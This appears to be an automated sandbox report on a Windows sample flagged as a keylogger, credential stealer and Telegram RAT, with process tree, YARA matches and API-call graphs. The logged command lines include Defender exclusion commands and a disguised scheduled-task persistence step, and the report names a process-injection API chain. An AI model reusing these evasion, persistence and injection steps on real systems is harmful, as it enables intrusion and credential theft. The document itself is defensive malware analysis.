                                                                                                                                                                     2024-11-07 05:20:31 UTC | 201 | IN | Data Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>
Target ID: 0
Start time: 00:20:01
Start date: 07/11/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0xe30000
File size: 921'600 bytes
MD5 hash: 57FCB286B01ACC3318E455C23D5F857F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0xa0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
Imagebase: 0xa0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
Imagebase: 0x210000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 00:20:04
Start date: 07/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 00:20:05
Start date: 07/11/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0x440000
File size: 921'600 bytes
MD5 hash: 57FCB286B01ACC3318E455C23D5F857F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 9
Start time: 00:20:05
Start date: 07/11/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0x300000
File size: 921'600 bytes
MD5 hash: 57FCB286B01ACC3318E455C23D5F857F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 10
Start time: 00:20:05
Start date: 07/11/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0x370000
File size: 921'600 bytes
MD5 hash: 57FCB286B01ACC3318E455C23D5F857F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 11
Start time: 00:20:05
Start date: 07/11/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Imagebase: 0x6d0000
File size: 921'600 bytes
MD5 hash: 57FCB286B01ACC3318E455C23D5F857F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 21%, ReversingLabs
• Detection: 22%, Virustotal
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:00:20:07
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"
                                                                                                                                                                    Imagebase:0x210000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\zDAKFK.exe"
                                                                                                                                                                    Imagebase:0x480000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:00:20:15
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
                                                                                                                                                                    Imagebase:0x1e0000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true


                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:13.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:1.7%
                                                                                                                                                                      Total number of Nodes:360
                                                                                                                                                                      Total number of Limit Nodes:15
execution_graph: the interactive node/edge dump is not reproduced here. Windows API calls resolved in the graph:
• CreateActCtxA, CreateWindowExW, CallWindowProcW, CreateIconFromResourceEx
• GetModuleHandleW, DuplicateHandle
• VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread: allocate in another process, write into it, overwrite a (WoW64) thread's context and resume it; this is the chain behind the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode (likely to inject code)" signatures.
50976 7b5d748 VirtualAllocEx 50975->50976 50978 7b5d785 50976->50978 50978->50916 50980 7b5dcb8 ReadProcessMemory 50979->50980 50982 7b5dd47 50980->50982 50982->50924 50984 7b5dd03 ReadProcessMemory 50983->50984 50986 7b5dd47 50984->50986 50986->50924 50988 7b5de50 CreateProcessA 50987->50988 50990 7b5e09b 50988->50990 50992 7b5ded9 CreateProcessA 50991->50992 50994 7b5e09b 50992->50994 50718 5778ac0 50719 5778aed 50718->50719 50748 5778568 50719->50748 50721 5778b69 50753 5778578 50721->50753 50723 5778b92 50724 5778568 CreateWindowExW 50723->50724 50725 5778cf2 50724->50725 50726 5778568 CreateWindowExW 50725->50726 50727 5778d1b 50726->50727 50728 5778568 CreateWindowExW 50727->50728 50729 5778d44 50728->50729 50730 5778568 CreateWindowExW 50729->50730 50731 5778d6d 50730->50731 50732 5778568 CreateWindowExW 50731->50732 50733 5778d96 50732->50733 50734 5778568 CreateWindowExW 50733->50734 50735 5778dbf 50734->50735 50736 5778568 CreateWindowExW 50735->50736 50737 5778de8 50736->50737 50738 5778568 CreateWindowExW 50737->50738 50739 5778e11 50738->50739 50740 5778568 CreateWindowExW 50739->50740 50741 5778e40 50740->50741 50742 5778568 CreateWindowExW 50741->50742 50743 5778e72 50742->50743 50744 5778568 CreateWindowExW 50743->50744 50745 5778f95 50744->50745 50746 5778568 CreateWindowExW 50745->50746 50747 5778fc7 50746->50747 50749 5778573 50748->50749 50752 1787860 CreateWindowExW 50749->50752 50758 178896f 50749->50758 50750 577ddfb 50750->50721 50752->50750 50754 5778583 50753->50754 50756 178896f CreateWindowExW 50754->50756 50757 1787860 CreateWindowExW 50754->50757 50755 577eccf 50755->50723 50756->50755 50757->50755 50759 17889ab 50758->50759 50760 1788c71 50759->50760 50761 178cfc0 CreateWindowExW 50759->50761 50760->50750 50761->50760 50791 7b5a3ed 50792 7b5a3fd 50791->50792 50794 7b5d181 ResumeThread 50792->50794 50795 7b5d190 ResumeThread 50792->50795 50793 7b5a990 50794->50793 50795->50793 50796 178d6a0 50797 178d6a5 GetCurrentProcess 50796->50797 
50799 178d738 GetCurrentThread 50797->50799 50800 178d731 50797->50800 50801 178d76e 50799->50801 50802 178d775 GetCurrentProcess 50799->50802 50800->50799 50801->50802 50803 178d7ab 50802->50803 50804 178d7d3 GetCurrentThreadId 50803->50804 50805 178d804 50804->50805 50615 7b5a63f 50616 7b5a65f 50615->50616 50620 7b5d181 50616->50620 50624 7b5d190 50616->50624 50617 7b5a686 50621 7b5d1c3 50620->50621 50622 7b5d231 50621->50622 50628 7b5d578 50621->50628 50622->50617 50625 7b5d1c3 50624->50625 50626 7b5d231 50625->50626 50627 7b5d578 ResumeThread 50625->50627 50626->50617 50627->50626 50629 7b5d552 50628->50629 50630 7b5d57f ResumeThread 50628->50630 50629->50622 50632 7b5d5f1 50630->50632 50632->50622 50708 f0317a8 50709 f031933 50708->50709 50710 f0317ce 50708->50710 50710->50709 50713 f031a20 50710->50713 50716 f031a28 PostMessageW 50710->50716 50714 f031a28 PostMessageW 50713->50714 50715 f031a94 50714->50715 50715->50710 50717 f031a94 50716->50717 50717->50710

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 294 93b78e8-93b8198 297 93b867b-93b86e4 294->297 298 93b819e-93b81a3 294->298 305 93b86eb-93b8773 297->305 298->297 299 93b81a9-93b81c6 298->299 299->305 306 93b81cc-93b81d0 299->306 346 93b877e-93b87fe 305->346 307 93b81df-93b81e3 306->307 308 93b81d2-93b81dc call 93b031c 306->308 309 93b81f2-93b81f9 307->309 310 93b81e5-93b81ef call 93b031c 307->310 308->307 315 93b81ff-93b822f 309->315 316 93b8314-93b8319 309->316 310->309 326 93b89fe-93b8a14 315->326 330 93b8235-93b8308 call 93b35c0 * 2 315->330 319 93b831b-93b831f 316->319 320 93b8321-93b8326 316->320 319->320 323 93b8328-93b832c 319->323 324 93b8338-93b8368 call 93b78f8 * 3 320->324 323->326 327 93b8332-93b8335 323->327 324->346 347 93b836e-93b8371 324->347 327->324 330->316 355 93b830a 330->355 363 93b8805-93b8887 346->363 347->346 350 93b8377-93b8379 347->350 350->346 352 93b837f-93b83b4 350->352 362 93b83ba-93b83c3 352->362 352->363 355->316 364 93b83c9-93b8423 call 93b78f8 * 2 call 93b7908 * 2 362->364 365 93b8526-93b852a 362->365 368 93b888f-93b8911 363->368 411 93b8435 364->411 412 93b8425-93b842e 364->412 365->368 369 93b8530-93b8534 365->369 373 93b8919-93b8946 368->373 372 93b853a-93b8540 369->372 369->373 376 93b8542 372->376 377 93b8544-93b8579 372->377 386 93b894d-93b89cd 373->386 382 93b8580-93b8586 376->382 377->382 382->386 387 93b858c-93b8594 382->387 446 93b89d4-93b89f6 386->446 393 93b859b-93b859d 387->393 394 93b8596-93b859a 387->394 399 93b85ff-93b8605 393->399 400 93b859f-93b85c3 393->400 394->393 405 93b8607-93b8622 399->405 406 93b8624-93b8652 399->406 429 93b85cc-93b85d0 400->429 430 93b85c5-93b85ca 400->430 426 93b865a-93b8666 405->426 406->426 416 93b8439-93b843b 411->416 412->416 417 93b8430-93b8433 412->417 424 93b843d 416->424 425 93b8442-93b8446 416->425 417->416 424->425 427 93b8448-93b844f 
425->427 428 93b8454-93b845a 425->428 445 93b866c-93b8678 426->445 426->446 432 93b84f1-93b84f5 427->432 433 93b845c-93b8462 428->433 434 93b8464-93b8469 428->434 429->326 437 93b85d6-93b85d9 429->437 435 93b85dc-93b85ed 430->435 441 93b84f7-93b8511 432->441 442 93b8514-93b8520 432->442 443 93b846f-93b8475 433->443 434->443 480 93b85ef call 93b8a98 435->480 481 93b85ef call 93b8a87 435->481 437->435 441->442 442->364 442->365 451 93b847b-93b8480 443->451 452 93b8477-93b8479 443->452 446->326 448 93b85f5-93b85fd 448->426 455 93b8482-93b8494 451->455 452->455 461 93b849e-93b84a3 455->461 462 93b8496-93b849c 455->462 463 93b84a9-93b84b0 461->463 462->463 466 93b84b2-93b84b4 463->466 467 93b84b6 463->467 471 93b84bb-93b84c6 466->471 467->471 472 93b84ea 471->472 473 93b84c8-93b84cb 471->473 472->432 473->432 475 93b84cd-93b84d3 473->475 476 93b84da-93b84e3 475->476 477 93b84d5-93b84d8 475->477 476->432 479 93b84e5-93b84e8 476->479 477->472 477->476 479->432 479->472 480->448 481->448
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                      • API String ID: 0-1677660839
                                                                                                                                                                      • Opcode ID: 41f41efc9764d2181b8c35ceb796ae9d41356a78bb80e73d5ed7c8153389b329
                                                                                                                                                                      • Instruction ID: 3e59fb34248c5ba72ae84212e6e9916ee421fa805b369c7e24c98fc02e2d3278
                                                                                                                                                                      • Opcode Fuzzy Hash: 41f41efc9764d2181b8c35ceb796ae9d41356a78bb80e73d5ed7c8153389b329
                                                                                                                                                                      • Instruction Fuzzy Hash: 61327B30A002188FDB64DFA8C8547AEBBF6BF84300F1485AAD509AF795DB349D46CF95
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a8880dfd13b4a1fb7c8c616314ea45492709e2226f16c097a40b1db55dd204bc
                                                                                                                                                                      • Instruction ID: e6d9d12f012e723a82bfb752af3988d6222187417fc79d7c5825d4f7320a0f25
                                                                                                                                                                      • Opcode Fuzzy Hash: a8880dfd13b4a1fb7c8c616314ea45492709e2226f16c097a40b1db55dd204bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B427FB4E1121DCFDB64CFA9C984B9DBBB2BF48310F1581A9E819A7355D730AA81CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7b17699c71d9081d5b08f8b20ccfe97bdbc3ac34690d273f710659e3538858a
                                                                                                                                                                      • Instruction ID: b94d4801aebdff35ed256145782cb6cd808701b56643bd934f2ddd66d0c4f366
                                                                                                                                                                      • Opcode Fuzzy Hash: f7b17699c71d9081d5b08f8b20ccfe97bdbc3ac34690d273f710659e3538858a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5732D2B0901219CFEB50DF69C580A8EFBB2FF48315F55D195E848AB212DB30E985CFA4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f9c793d401fa9f1e339b0b4df28b3b85a42a9aed909f56736c8b55d7010cab51
                                                                                                                                                                      • Instruction ID: d79bbe1513d5a2e0ac2fa1734900bace2bc94e636762b96a663ce123b48256d7
                                                                                                                                                                      • Opcode Fuzzy Hash: f9c793d401fa9f1e339b0b4df28b3b85a42a9aed909f56736c8b55d7010cab51
                                                                                                                                                                      • Instruction Fuzzy Hash: 53C1CB70B016008FDB29EB75C460BAEB7FAAF89700F5484ADD146CB295DF34E901CB52
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 343bfaaf1e5dcae4bf07e258e713ddcc797b205ebb93be6a731dcb528d55d8ef
                                                                                                                                                                      • Instruction ID: 5f4015b8d7dbe8f38786c3ad025dbdadd138f5400f3f0e764cb0fa0e52dbf067
                                                                                                                                                                      • Opcode Fuzzy Hash: 343bfaaf1e5dcae4bf07e258e713ddcc797b205ebb93be6a731dcb528d55d8ef
                                                                                                                                                                      • Instruction Fuzzy Hash: 18C13A31E002588FCB15DFA9C8807DEBBB6AF88300F14C5AADA49AF655DB34D985CF51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5f8fe6e0b8a8f51537f07d7bef35f34131bc8b1f307820d2861ea8fef5b9800c
                                                                                                                                                                      • Instruction ID: b72d2cca4c8685e5f5f03dc38301de0a1ccb4269466e64936a6162f1c88fda04
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f8fe6e0b8a8f51537f07d7bef35f34131bc8b1f307820d2861ea8fef5b9800c
                                                                                                                                                                      • Instruction Fuzzy Hash: BA61A3B4E01218CFEB18CF9AD994B9DBBF2BF88310F1481A9E809A7354DB719941CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fc9846eb80f61865d93330c2067c55b48e3bcb1324c18ba397957fc9118dd5fe
                                                                                                                                                                      • Instruction ID: e9230582f0286bfb4a48f18864b0304f8f3bc08dcdbbf67e39ae968e34905ec3
                                                                                                                                                                      • Opcode Fuzzy Hash: fc9846eb80f61865d93330c2067c55b48e3bcb1324c18ba397957fc9118dd5fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D5183B5D116199FDB04CFEAD9446EEBBF2FF89300F10806AE819AB254DB345946CF40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 39dcc30711f530faca070d57c606e12eca3c86ae3530cfb87c34f75c35819592
                                                                                                                                                                      • Instruction ID: 2f6706c35b4977bc8424de97dfb64734462daac2282c2bb4fa82c6a76c8048f5
